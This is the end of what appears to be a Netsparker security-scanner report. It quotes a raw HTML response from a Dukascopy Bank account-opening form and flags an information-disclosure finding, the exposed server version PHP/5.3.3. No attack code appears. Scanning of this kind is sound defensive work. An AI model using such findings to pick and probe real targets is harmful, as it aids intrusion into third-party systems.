&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
                                oElement.value = value;
                                bFound = false;
                                for (i=0; i&lt;oElement.options.length; i++)    {
                                    if(oElement.options[i].value == value)    {
                                        oElement.options[i].selected = true;
                                        bFound = true;
                                        break;
                                    }
                                }
                                if(value &amp;&amp; !bFound)    {
                                    oNew = document.createElement(&quot;OPTION&quot;);
                                    oNew.value = value;
                                    oNew.innerHTML = value;
                                    oElement.appendChild(oNew);
                                    oElement.lastChild.selected = true;
                                }
                            break;
                            default:
                                if(oElement.length)    {
                                    for(i=0;i&lt;oElement.length;i++)    {
                                        if(oElement[i].value == value)
                                            oElement[i].click();
                                        else
                                            oElement[i].checked = false;
                                    }
                                }
                                else {
                                    if(oElement.type == &quot;checkbox&quot;)
                                        oElement.click();
                                    else {
		                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
		                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
                                    //  oElement.value = value;
                                        }
                                }
                            break;
                        }
                        try    {
                            oElement.fireEvent(&quot;onchange&quot;);
                        }
                        catch(e) {
                            try {
                                var evt = document.createEvent(&quot;HTMLEvents&quot;);
                                evt.initEvent(&quot;change&quot;,true,true);
                                oElement.dispatchEvent( evt );
                            }
                            catch(e){}
                        }
                    }
                    catch(e){}
                }
                function fFillForm()    {}&lt;/script&gt;&lt;/form&gt;
&lt;/table&gt;
&lt;img id=&quot;progress_img&quot; src=&quot;../../images/progress_bar.gif&quot; width=&quot;69&quot; height=&quot;17&quot; border=&quot;0&quot; style=&quot;display:none;&quot;&gt;
  &lt;/body&gt;
&lt;/html&gt;
 ]]></rawresponse>

		<extrainformation>
			<info name="Extracted Version">PHP/5.3.3</info>
		</extrainformation>


        <classification>
            <OWASP>A6</OWASP>
            <WASC>13</WASC>
            <CWE></CWE>
            <CAPEC></CAPEC>
        </classification>
				
	</vulnerability>

</netsparker>
